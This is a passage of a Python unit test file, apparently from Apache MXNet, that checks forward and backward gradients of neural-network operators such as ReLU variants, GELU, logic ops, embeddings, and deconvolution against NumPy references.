swap0 = mx.symbol.SwapAxis(data=data, dim1=0, dim2=2)
swap = mx.symbol.SwapAxis(data=swap0, dim1=1, dim2=2)
exe_c = swap.bind(default_context(), args=[arr_data])
exe_c.forward(is_train=True)
out = exe_c.outputs[0].asnumpy()
swap0_ = np.swapaxes(data_tmp, 0, 2)
swap_ = np.swapaxes(swap0_, 1, 2)
assert_almost_equal(out, swap_)
@with_seed()
def test_scalarop():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)*5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = 2 / (4-((1+data+1)*2/5)-0.8-(data!=0))
npout_1 = (4-((1+data_tmp+1)*2/5)-0.8-(data_tmp!=0))
npout = 2/npout_1
check_symbolic_forward(test, [data_tmp], [npout])
npout_grad = 2.*2/5
npout_grad = 2*npout_grad /(npout_1 *npout_1 )
check_symbolic_backward(test, [data_tmp], [np.ones(shape)*2], [npout_grad])
@with_seed()
def test_scalar_pow():
data = mx.symbol.Variable('data')
shape = (1, 1)
data_tmp = np.ones(shape)
test = data ** 2
check_numeric_gradient(test, [data_tmp])
check_symbolic_forward(test, [data_tmp], [data_tmp ** 2])
check_symbolic_backward(test, [data_tmp], [np.ones(shape)], [2 * data_tmp])
@with_seed()
def test_symbol_pow():
shape = (1, 1)
data = mx.symbol.Variable('data')
data_tmp = np.ones(shape)*2
exp = mx.symbol.Variable('exp')
exp_tmp = np.ones(shape)*3
test = data**exp
check_numeric_gradient(test, [data_tmp, exp_tmp])
check_symbolic_forward(test, [data_tmp, exp_tmp], [data_tmp**exp_tmp])
data_dir = data_tmp**(exp_tmp - 1) * exp_tmp
exp_dir = data_tmp**(exp_tmp) * np.log(data_tmp)
check_symbolic_backward(test, [data_tmp, exp_tmp], [np.ones(shape)], [data_dir, exp_dir])
@with_seed()
def test_pow_fn():
shape = (3, 4)
exp = mx.symbol.Variable("exp")
x = np.ones(shape)*3
for y in [mx.sym.pow(2, exp), mx.sym.power(2, exp)]:
check_numeric_gradient(y, [x], numeric_eps=1E-3)
check_symbolic_forward(y, [x], [2**x])
check_symbolic_backward(y, [x], [np.ones(shape)], [np.log(2) * 2**x])
@with_seed()
def test_relu():
def frelu(x):
return np.maximum(x, 0.0)
def frelu_grad(x):
return 1.0 * (x > 0.0)
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.relu(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
eps = 1e-4
# Avoid finite difference method inaccuracies due to discontinuous gradient at the origin.
# Here we replace small problematic inputs with 1.0. Repro issue with seed 97264195.
xa[abs(xa) < eps] = 1.0
ya = frelu(xa)
ga = frelu_grad(xa)
check_numeric_gradient(y, [xa], numeric_eps=eps)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga])
# NOTE(haojin2): Skipping the numeric check tests for float16 data type due to precision issues,
# the analytical checks are still performed on each and every data type to verify the correctness.
@with_seed()
def test_leaky_relu():
def fleaky_relu(x, act_type, slope=0.25):
neg_indices = x < 0
out = x.copy()
if act_type == 'elu':
out[neg_indices] = slope * np.expm1(out[neg_indices])
elif act_type == 'leaky':
out[neg_indices] = slope * out[neg_indices]
return out
def fleaky_relu_grad(grad, x, y, act_type, slope=0.25):
neg_indices = x < 0
out = np.ones(x.shape)
if act_type == 'elu':
out[neg_indices] = y[neg_indices] + slope
elif act_type == 'leaky':
out[neg_indices] = slope
return out * grad
for ndim in range(1, 4):
shape = rand_shape_nd(ndim)
x = mx.symbol.Variable("x")
slp = 0.25
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-1.0,high=1.0,size=shape).astype(dtype)
eps = 1e-4
rtol = 1e-2
atol = 1e-3
xa[abs(xa) < eps] = 1.0
for act_type in ['elu', 'leaky']:
y = mx.symbol.LeakyReLU(data=x, slope=slp, act_type=act_type)
ya = fleaky_relu(xa, slope=slp, act_type=act_type)
ga = fleaky_relu_grad(np.ones(shape), xa, ya, slope=slp, act_type=act_type)
# Skip numeric check for float16 type to get rid of flaky behavior
if dtype is not np.float16:
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga], rtol=rtol, atol=atol, dtype=dtype)
# NOTE(haojin2): Skipping the numeric check tests for float16 data type due to precision issues,
# the analytical checks are still performed on each and every data type to verify the correctness.
@with_seed()
@unittest.skip("Flaky test tracked by https://github.com/apache/incubator-mxnet/issues/12885")
def test_prelu():
def fprelu(x, gamma):
pos_indices = x > 0
out = x.copy()
if len(x.shape) == 4:
out = out.transpose(2,3,0,1)
out = np.multiply(out, gamma)
out = out.transpose(2,3,0,1)
else:
out = np.multiply(out, gamma)
out[pos_indices] = x[pos_indices]
return out
def fprelu_grad(x, y, gamma):
pos_indices = x > 0
if len(x.shape) == 4:
grad_x = np.multiply(np.ones(x.shape).transpose(2,3,0,1), gamma)
grad_x = grad_x.transpose(2,3,0,1)
else:
grad_x = np.multiply(np.ones(x.shape), gamma)
grad_gam = np.zeros(gamma.shape)
copy_x = x.copy()
copy_x[pos_indices] = 0.0
grad_x[pos_indices] = 1.0
if len(gamma.shape) > 1 and len(x.shape) != 4:
grad_gam = copy_x
elif len(gamma.shape) > 1 and len(x.shape) == 4:
grad_gam = np.sum(copy_x, axis=(2,3))
elif gamma.shape[0] == 1:
grad_gam = np.sum(np.sum(copy_x))
elif gamma.shape[0] > 1 and len(x.shape) != 4:
grad_gam = np.sum(copy_x, axis=0)
elif gamma.shape[0] > 1 and len(x.shape) == 4:
grad_gam = np.sum(copy_x, axis=(0,2,3))
return (grad_x, grad_gam)
x = mx.symbol.Variable("x")
gamma = mx.symbol.Variable("gamma")
for shape in [(3,4), (3,4,4,5)]:
for dtype in [np.float16, np.float32, np.float64]:
for gam in [np.array([0.1, 0.2, 0.3, 0.4], dtype=dtype)]:
gam_full = np.array([gam, gam, gam])
xa = np.random.uniform(low=-1.0,high=1.0,size=shape).astype(dtype)
rtol = 1e-2
atol = 1e-3
eps = 1e-4
xa[abs(xa) < eps] = 1.0
y = mx.symbol.LeakyReLU(data=x, gamma=gamma, act_type='prelu')
ya = fprelu(xa, gam)
ya_full = fprelu(xa, gam_full)
g_xa, g_gam = fprelu_grad(xa, ya, gamma=gam)
g_xa_full, g_gam_full = fprelu_grad(xa, ya_full, gamma=gam_full)
# Skip numeric check for float16 type to get rid of flaky behavior
if dtype is not np.float16:
check_numeric_gradient(y, [xa, gam], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_numeric_gradient(y, [xa, gam_full], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa, gam], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa, gam], [np.ones(shape), np.ones(gam.shape)], [g_xa, g_gam], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa, gam_full], [ya_full], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa, gam_full], [np.ones(shape), np.ones(gam_full.shape)],
[g_xa_full, g_gam_full], rtol=rtol, atol=atol, dtype=dtype)
@with_seed()
def test_selu():
alpha = 1.6732632423543772848170429916717
lamb = 1.0507009873554804934193349852946
def fselu(x):
neg_indices = x < 0
out = x.copy()
out[neg_indices] = alpha * np.expm1(out[neg_indices])
return out * lamb
def fselu_grad(grad, x, y):
neg_indices = x < 0
out = np.ones(x.shape).astype(x.dtype)
out[neg_indices] = y[neg_indices] + alpha
return out * lamb
shape = (3, 4)
x = mx.sym.Variable("x")
y = mx.sym.LeakyReLU(data=x, act_type="selu")
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-0.1,high=0.1,size=shape).astype(dtype)
eps, rtol, atol = (7.5e-4, 1e-1, 1e-2) if dtype is np.float16 else (1e-4, 1e-2, 1e-4)
if dtype is np.float16:
xa /= 10.0
xa[abs(xa) < eps] = 0.01
ya = fselu(xa)
ga = fselu_grad(np.ones(shape).astype(dtype), xa, ya)
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga], rtol=rtol, atol=atol, dtype=dtype)
@with_seed()
def test_gelu():
CUBE_CONSTANT = 0.044715
ROOT_TWO_OVER_PI = 0.7978845608028654
def g(x):
return ROOT_TWO_OVER_PI * (x + CUBE_CONSTANT * np.power(x, 3))
def g_grad(x):
return ROOT_TWO_OVER_PI * (1.0 + 3.0 * CUBE_CONSTANT * np.power(x, 2))
def f(x):
return 1.0 + np.tanh(g(x))
def f_grad(x):
return (1.0 - np.tanh(g(x)) * np.tanh(g(x))) * g_grad(x)
def fgelu(x):
return 0.5 * x * f(x)
def fgelu_grad(grad, x, y):
return grad * (y / x + y * (1 - np.tanh(g(x))) * g_grad(x))
shape = (3, 4)
x = mx.sym.Variable("x")
y = mx.sym.LeakyReLU(data=x, act_type="gelu")
for dtype in [np.float16, np.float32, np.float64]:
xa = np.random.uniform(low=-0.1,high=0.1,size=shape).astype(dtype)
eps, rtol, atol = (7.5e-4, 1e-1, 1e-2) if dtype is np.float16 else (1e-4, 1e-2, 1e-4)
if dtype is np.float16:
xa /= 10.0
xa[abs(xa) < eps] = 0.01
ya = fgelu(xa)
ga = fgelu_grad(np.ones(shape).astype(dtype), xa, ya)
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [ga], rtol=rtol, atol=atol, dtype=dtype)
@with_seed()
def test_sigmoid():
def fsigmoid(a):
return np.divide(1.0, (1.0 + np.exp(-a)))
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.sigmoid(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
ya = fsigmoid(xa)
check_numeric_gradient(y, [xa], numeric_eps=1E-3)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ya * (1 - ya)])
@with_seed()
def test_shape_array():
for i in range(1,6):
shape = rand_shape_nd(i)
x = mx.sym.var('x')
y = mx.sym.shape_array(x)
xa = mx.nd.array(np.random.ranf(shape))
xg = mx.nd.empty(xa.shape)
ya = np.shape(xa)
yg = mx.nd.ones(ya)
exe = y.bind(ctx=default_context(), args={'x': xa},
args_grad={'x': xg})
exe.forward(is_train=True)
exe.backward([yg])
yo = exe.outputs[0].asnumpy()
same(yo, ya)
assert_almost_equal(xg.asnumpy(), np.zeros_like(xg.asnumpy()))
@with_seed()
def test_size_array():
for i in range(1,6):
shape = rand_shape_nd(i)
x = mx.sym.var('x')
y = mx.sym.size_array(x)
xa = mx.nd.array(np.random.ranf(shape))
xg = mx.nd.empty(xa.shape)
ya = np.size(xa)
yg = mx.nd.ones(ya)
exe = y.bind(ctx=default_context(), args={'x': xa},
args_grad={'x': xg})
exe.forward(is_train=True)
exe.backward([yg])
yo = exe.outputs[0].asnumpy()
same(yo, ya)
assert_almost_equal(xg.asnumpy(), np.zeros_like(xg.asnumpy()))
@with_seed()
def test_hard_sigmoid():
def fhardsigmoid(a, alpha=0.2, beta=0.5):
return np.maximum(np.zeros(a.shape, dtype=a.dtype),
np.minimum(np.ones(a.shape, dtype=a.dtype), alpha*a+beta))
def fhardsigmoid_grad(a, out_grad, alpha=0.2, beta=0.5):
orig_out = fhardsigmoid(a, alpha, beta)
res = out_grad * alpha
res[orig_out <= 0.0] = 0.0
res[orig_out >= 1.0] = 0.0
return res
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.hard_sigmoid(x)
for dtype in [np.float16, np.float32, np.float64]:
if dtype is np.float16:
rtol = 1e-2
else:
rtol = 1e-3
atol = 1e-3
eps = 1e-3
xa = np.random.uniform(low=-3.0,high=3.0,size=shape).astype(dtype)
# function not differentiable at x=2.5 and -2.5
xa[abs(xa-2.5) < eps] -= 2 * eps
xa[abs(xa+2.5) < eps] += 2 * eps
ya = fhardsigmoid(xa)
grad_xa = fhardsigmoid_grad(xa, np.ones(shape))
if dtype is not np.float16:
check_numeric_gradient(y, [xa], numeric_eps=eps, rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_forward(y, [xa], [ya], rtol=rtol, atol=atol, dtype=dtype)
check_symbolic_backward(y, [xa], [np.ones(shape)], [grad_xa], rtol=rtol, atol=atol, dtype=dtype)
@with_seed()
def test_softsign():
def fsoftsign(a):
return np.divide(a, (1.0 + np.abs(a)))
def fsoftsign_grad(a):
return np.divide(1.0, np.square((1.0 + np.abs(a))))
shape = (3, 4)
x = mx.symbol.Variable("x")
y = mx.sym.softsign(x)
xa = np.random.uniform(low=-1.0,high=1.0,size=shape)
ya = fsoftsign(xa)
ya_grad = fsoftsign_grad(xa)
check_numeric_gradient(y, [xa], numeric_eps=1E-3)
check_symbolic_forward(y, [xa], [ya])
check_symbolic_backward(y, [xa], [np.ones(shape)], [ya_grad])
@with_seed()
def test_binary_logic():
def _inner_test(forward_gt, logic_sym, x_shape, y_shape, test_scalar=True):
x = mx.symbol.Variable("x")
y = mx.symbol.Variable("y")
z = logic_sym(x, y)
x_npy = np.random.randint(0, 4, size=x_shape).astype(np.float32)
y_npy = np.random.randint(0, 4, size=y_shape).astype(np.float32)
exe = z.simple_bind(ctx=default_context(), x=x_shape, y=y_shape)
mx_out = exe.forward(is_train=True, x=x_npy, y=y_npy)[0].asnumpy()
assert_almost_equal(mx_out, forward_gt(x_npy, y_npy))
exe.backward()
if test_scalar:
z_lscalar = logic_sym(1, y)
z_rscalar = logic_sym(x, 1)
exe_lscalar = z_lscalar.simple_bind(ctx=default_context(), y=y_shape)
exe_rscalar = z_rscalar.simple_bind(ctx=default_context(), x=x_shape)
mx_lscalar_out = exe_lscalar.forward(is_train=True, y=y_npy)[0].asnumpy()
mx_rscalar_out = exe_rscalar.forward(is_train=True, x=x_npy)[0].asnumpy()
assert_almost_equal(mx_lscalar_out, forward_gt(1, y_npy))
assert_almost_equal(mx_rscalar_out, forward_gt(x_npy, 1))
exe_lscalar.backward()
exe_rscalar.backward()
# Test the no-broadcasting binary logic ops + scalar logic ops
_inner_test(forward_gt=lambda x, y: x == y,
logic_sym=lambda x, y: x == y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x > y,
logic_sym=lambda x, y: x > y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x >= y,
logic_sym=lambda x, y: x >= y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x < y,
logic_sym=lambda x, y: x < y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x <= y,
logic_sym=lambda x, y: x <= y, x_shape=(10, 10), y_shape=(10, 10))
_inner_test(forward_gt=lambda x, y: x != y,
logic_sym=lambda x, y: x != y, x_shape=(10, 10), y_shape=(10, 10))
# Test the broadcasting binary logic ops
_inner_test(forward_gt=lambda x, y: x == y,
logic_sym=lambda x, y: mx.sym.broadcast_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x > y,
logic_sym=lambda x, y: mx.sym.broadcast_greater(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x >= y,
logic_sym=lambda x, y: mx.sym.broadcast_greater_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x < y,
logic_sym=lambda x, y: mx.sym.broadcast_lesser(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x <= y,
logic_sym=lambda x, y: mx.sym.broadcast_lesser_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
_inner_test(forward_gt=lambda x, y: x != y,
logic_sym=lambda x, y: mx.sym.broadcast_not_equal(x, y),
x_shape=(1, 10), y_shape=(10, 1), test_scalar=False)
@with_seed()
def test_unary_logic():
def reference(a, dtype):
return np.logical_not(a).astype(dtype)
shape = (3, 4)
xa = np.random.randint(-2, 2, size=shape).astype(np.float32)
mx_xa = mx.nd.array(xa)
mx_out = mx.nd.logical_not(mx_xa)
assert_almost_equal(mx_out.asnumpy(), reference(xa, dtype=xa.dtype))
x = mx.sym.Variable('x')
y = mx.sym.logical_not(data=x)
exe = y.simple_bind(ctx=default_context(), x=shape)
sym_out = exe.forward(is_train=True, x=mx_xa)[0]
assert_almost_equal(sym_out.asnumpy(), reference(xa, dtype=xa.dtype))
@with_seed()
def test_embedding():
in_dim = 10
out_dim = 4
batch = 24
data = mx.sym.Variable("data")
embed = mx.sym.Embedding(data=data, input_dim=in_dim, output_dim=out_dim, name="embed")
exe_test = embed.simple_bind(default_context(), grad_req={'data': 'null', 'embed_weight': 'write'}, data=(batch,))
arg_map = dict(zip(embed.list_arguments(), exe_test.arg_arrays))
grad_map = dict(zip(embed.list_arguments(), exe_test.grad_arrays))
np_data = np.random.randint(low=0, high=in_dim, size=batch)
np_weight = np.random.uniform(-0.01, 0.01, arg_map["embed_weight"].shape)
np_onehot = np.zeros((batch, in_dim))
np_onehot[np.arange(batch), np_data] = 1.0
# forward
arg_map["data"][:] = np_data
arg_map["embed_weight"][:] = np_weight
exe_test.forward(is_train=True)
# Non-zero atol required, as exposed by seed 781663739
rtol = 1e-5
atol = 1e-5
assert_almost_equal(exe_test.outputs[0].asnumpy(), np.dot(np_onehot, np_weight), rtol=rtol, atol=atol)
# backward
np_grad = np.random.uniform(-1, 1, exe_test.outputs[0].shape)
grad = mx.nd.zeros(np_grad.shape)
grad[:] = np_grad
exe_test.backward([grad])
assert_almost_equal(grad_map["embed_weight"].asnumpy(), np.dot(np_onehot.T, np_grad), rtol=rtol, atol=atol)
# check ops handle duplicate input correctly.
@with_seed()
def test_binary_op_duplicate_input():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:] = 5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:] = 3
out_grad = mx.nd.empty(shape)
out_grad[:] = 1
square = data * data
exe_square = square.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_square.forward(is_train=True)
assert_almost_equal(exe_square.outputs[0].asnumpy(), data_tmp * data_tmp)
exe_square.backward(out_grad)
assert_almost_equal(arr_grad.asnumpy(), 2.0 * data_tmp)
@with_seed()
def test_sign():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = mx.sym.sign(data)
exe_test = test.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0].asnumpy()
npout = np.sign(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2;
npout_grad = out_grad.asnumpy()
npout_grad = 0;
exe_test.backward(out_grad)
assert_almost_equal(arr_grad.asnumpy(), npout_grad)
@with_seed()
def test_round_ceil_floor():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5.543
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]= 2
test = mx.sym.round(data) + mx.sym.ceil(data) + mx.sym.floor(data)
exe_test = test.bind(default_context(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0].asnumpy()
npout = np.round(data_tmp) + np.ceil(data_tmp) + np.floor(data_tmp)
assert_almost_equal(out, npout)
@with_seed()
def test_trunc():
data_tmp = np.random.rand(3, 4) * 10 - 5
arr_data = mx.nd.array(data_tmp)
data = mx.symbol.Variable('data')
test = mx.sym.trunc(data)
exe_test = test.bind(default_context(), args=[arr_data])
exe_test.forward(is_train=True)
out = exe_test.outputs[0].asnumpy()
# 'trunc' is sensitive to the precision of the calculation. Force numpy to match mxnet's float32.
# Repro issue with seed 1660190454
npout = np.trunc(np.float32(data_tmp))
assert_almost_equal(out, npout)
@with_seed()
def test_rsqrt_cos_sin():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = mx.sym.rsqrt(data) + mx.sym.cos(data) + mx.sym.sin(data)
exe_test = test.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0].asnumpy()
npout = 1/ np.sqrt(data_tmp) + np.cos(data_tmp) + np.sin(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2;
npout_grad = out_grad.asnumpy()
npout_grad = npout_grad * -(1.0 / (2.0 * data_tmp * np.sqrt(data_tmp))) + npout_grad * -1 * np.sin(data_tmp) + npout_grad * np.cos(data_tmp)
exe_test.backward(out_grad)
assert_almost_equal(arr_grad.asnumpy(), npout_grad)
@with_seed()
def test_maximum_minimum():
data1 = mx.symbol.Variable('data')
data2 = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp1 = np.random.rand(3,4)
data_tmp2 = np.random.rand(3,4)
data_tmp1[:] = 2
data_tmp2[:] = 3
arr_data1 = mx.nd.array(data_tmp1)
arr_data2 = mx.nd.array(data_tmp2)
arr_grad1 = mx.nd.empty(shape)
arr_grad2 = mx.nd.empty(shape)
test = mx.sym.maximum(data1,data2) + mx.sym.minimum(data1,data2);
exe_test = test.bind(default_context(), args=[arr_data1,arr_data2], args_grad=[arr_grad1,arr_grad2])
exe_test.forward(is_train=True)
out = exe_test.outputs[0].asnumpy()
npout = np.maximum(data_tmp1,data_tmp2) + np.minimum(data_tmp1,data_tmp2)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
exe_test.backward(out_grad)
npout_grad = np.ones(shape)
npout_grad[:] = 2
mask1 = (data_tmp1 > data_tmp2).astype('float')
mask2 = (data_tmp1 < data_tmp2).astype('float')
npout_grad1 = npout_grad * mask1 + npout_grad * mask2
npout_grad2 = (npout_grad - npout_grad * mask1) + (npout_grad - npout_grad * mask2)
assert_almost_equal(arr_grad1.asnumpy(), npout_grad1)
assert_almost_equal(arr_grad2.asnumpy(), npout_grad2)
@with_seed()
def test_maximum_minimum_scalar():
data1 = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp1 = np.random.rand(3,4)
data_tmp1[:] = 2
arr_data1 = mx.nd.array(data_tmp1)
arr_grad1 = mx.nd.empty(shape)
test = mx.sym.maximum(data1,3) + mx.sym.maximum(9,data1) + mx.sym.minimum(5,data1) + mx.sym.minimum(data1,4)
exe_test = test.bind(default_context(), args=[arr_data1], args_grad=[arr_grad1])
exe_test.forward(is_train=True)
out = exe_test.outputs[0].asnumpy()
npout = np.maximum(data_tmp1,3) + np.maximum(9,data_tmp1) + np.minimum(5,data_tmp1) + np.minimum(data_tmp1,4)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2
exe_test.backward(out_grad)
npout_grad = np.ones(shape)
npout_grad[:] = 2
mask1 = (data_tmp1 > 3).astype('float')
mask2 = (9 > data_tmp1).astype('float')
mask3 = (5 < data_tmp1).astype('float')
mask4 = (data_tmp1 < 4).astype('float')
npout_grad1 = npout_grad * mask1 + (npout_grad - npout_grad * mask2) + (npout_grad - npout_grad * mask3) + npout_grad * mask4
assert_almost_equal(arr_grad1.asnumpy(), npout_grad1)
@with_seed()
def test_abs():
data = mx.symbol.Variable('data')
shape = (3, 4)
data_tmp = np.ones(shape)
data_tmp[:]=5
arr_data = mx.nd.array(data_tmp)
arr_grad = mx.nd.empty(shape)
arr_grad[:]=3
test = mx.sym.abs(data)
exe_test = test.bind(default_context(), args=[arr_data], args_grad=[arr_grad])
exe_test.forward(is_train=True)
out = exe_test.outputs[0].asnumpy()
npout = abs(data_tmp)
assert_almost_equal(out, npout)
out_grad = mx.nd.empty(shape)
out_grad[:] = 2;
npout_grad = out_grad.asnumpy()
npout_grad = npout_grad * np.sign(data_tmp)
exe_test.backward(out_grad)
assert_almost_equal(arr_grad.asnumpy(), npout_grad)
def check_deconvolution_forward_backward(input_shape, num_filter, kernel, stride, pad):
"""configure A: input --> conv --> deconv --> output.
the convolution and deconvoluiton has similar parameter which ensure
the input shape is the same as output, and the same weights between conv
and deconv;
If the input value of forward() and backwrad() is the same, then
the output value of them should also the same;
"""
assert input_shape[1] == num_filter
data = mx.sym.Variable(name="data")
conv = mx.sym.Convolution(
data=data, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "conv")
deconv = mx.sym.Deconvolution(
data=conv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "deconv")
arg_names = deconv.list_arguments()
arg_shapes, out_shapes, _ = deconv.infer_shape(data=input_shape)
input_data = mx.random.uniform(-5, 5, input_shape, ctx=mx.cpu()).copyto(default_context())
out_grad = input_data
args = {}
args["data"] = input_data
args['conv_weight'] = args['deconv_weight'] = mx.random.normal(0, 1,
(num_filter, input_shape[1]) + kernel, ctx=mx.cpu()).copyto(default_context())
args_grad = [mx.nd.empty(s) for s in arg_shapes]
exe = deconv.bind(default_context(), args=args, args_grad=args_grad)
exe.forward(is_train=True)
out = exe.outputs[0].asnumpy()
exe.backward(out_grad)
assert_almost_equal(out, args_grad[0].asnumpy(), rtol=1E-3, atol=1e-3)
args_grad_addto_npy = [np.random.normal(size=s) for s in arg_shapes]
args_grad_addto = [mx.nd.array(ele) for ele in args_grad_addto_npy]
exe = deconv.bind(default_context(), args=args, args_grad=args_grad_addto, grad_req="add")
exe.forward(is_train=True)
out = exe.outputs[0].asnumpy()
exe.backward(out_grad)
assert_almost_equal(out + args_grad_addto_npy[0], args_grad_addto[0].asnumpy(), rtol=1e-3, atol=1e-3)
def check_deconvolution_gradient(input_shape, num_filter, pad):
"""configure A: input --> conv --> output.
configure B: input --> deconv --> output
the convolution and deconvoluiton has similar parameter which ensure
the input shape is the same as output;
During backward(), if the input of A equals output of B, and the output
of A equals input of B, then the grad of weight should be the same;
"""
ndim = len(pad)
stride = (1,) * ndim
kernel = tuple(2 * np.array(pad) + 1)
data_conv = mx.sym.Variable(name="data_conv")
conv = mx.sym.Convolution(
data=data_conv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "conv")
data_deconv = mx.sym.Variable(name="data_deconv")
deconv = mx.sym.Deconvolution(
data=data_deconv, kernel=kernel, stride=stride, pad=pad,
num_filter=num_filter, no_bias = "true", name = "deconv")
conv_data = mx.random.uniform(-5, 5, input_shape, ctx=mx.cpu()).copyto(default_context())
conv_args = {}
conv_args["data_conv"] = conv_data
conv_args['conv_weight'] = \
mx.random.normal(0, 1,(num_filter, input_shape[1]) + kernel, ctx=mx.cpu()).copyto(default_context())
conv_args_grad = [mx.nd.zeros(conv_data.shape),
mx.nd.zeros((num_filter, input_shape[1]) + kernel)]
exe_conv = conv.bind(default_context(), args=conv_args, args_grad=conv_args_grad)
exe_conv.forward(is_train=True)
conv_out_grad = mx.random.normal(0, 2, exe_conv.outputs[0].shape, ctx=mx.cpu()).copyto(default_context())
exe_conv.backward(conv_out_grad)
deconv_data = conv_out_grad
deconv_args = {}
deconv_args['data_deconv'] = deconv_data
deconv_args['deconv_weight'] = conv_args['conv_weight']
deconv_args_grad = [mx.nd.zeros(deconv_data.shape),
mx.nd.zeros((num_filter, input_shape[1]) + kernel)]
deconv_addto_args_grad_npy = [np.random.normal(size=deconv_data.shape),
np.random.normal(size=(num_filter, input_shape[1]) + kernel)]
deconv_addto_args_grad = [mx.nd.array(deconv_addto_args_grad_npy[0]),
mx.nd.array(deconv_addto_args_grad_npy[1])]
exe_deconv = deconv.bind(default_context(), args=deconv_args, args_grad=deconv_args_grad)
exe_deconv.forward(is_train=True)
deconv_out_grad = conv_data[:]
exe_deconv.backward(deconv_out_grad)
assert_almost_equal(conv_args_grad[1].asnumpy(), deconv_args_grad[1].asnumpy(), rtol=1e-3, atol=1e-2)
# Test AddTo
exe_deconv_addto = deconv.bind(default_context(), args=deconv_args,
args_grad=deconv_addto_args_grad,
grad_req="add")
exe_deconv_addto.forward(is_train=True)
deconv_out_grad = conv_data[:]
exe_deconv_addto.backward(deconv_out_grad)
assert_almost_equal(conv_args_grad[1].asnumpy() + deconv_addto_args_grad_npy[1],
deconv_addto_args_grad[1].asnumpy(), rtol=1e-3, atol=1e-2)
def check_deconvolution_target_shape(input_shape, kernel, stride, pad, adj, target_shape=None):
data = mx.sym.Variable(name="data")
if target_shape:
deconv = mx.sym.Deconvolution(
data=data, kernel=kernel, stride=stride, pad=pad, adj=adj, num_filter=5,
target_shape = target_shape)
else:
deconv = mx.sym.Deconvolution(
data=data, kernel=kernel, stride=stride, pad=pad, adj=adj, num_filter=5)
arg_names = deconv.list_arguments()
arg_shapes, out_shapes, _ = deconv.infer_shape(data=input_shape)
default_target_size = 8
if target_shape is None:
target_shape = (default_target_size,) * len(kernel)
assert out_shapes[0] == (input_shape[0], 5) + target_shape
@with_seed()
def test_deconvolution():
# 2D
check_deconvolution_target_shape(
input_shape = (2,3,4,4),
kernel = (3,3),
stride = (2,2),
target_shape = (8,8),
pad = (99,99), # will be ignored
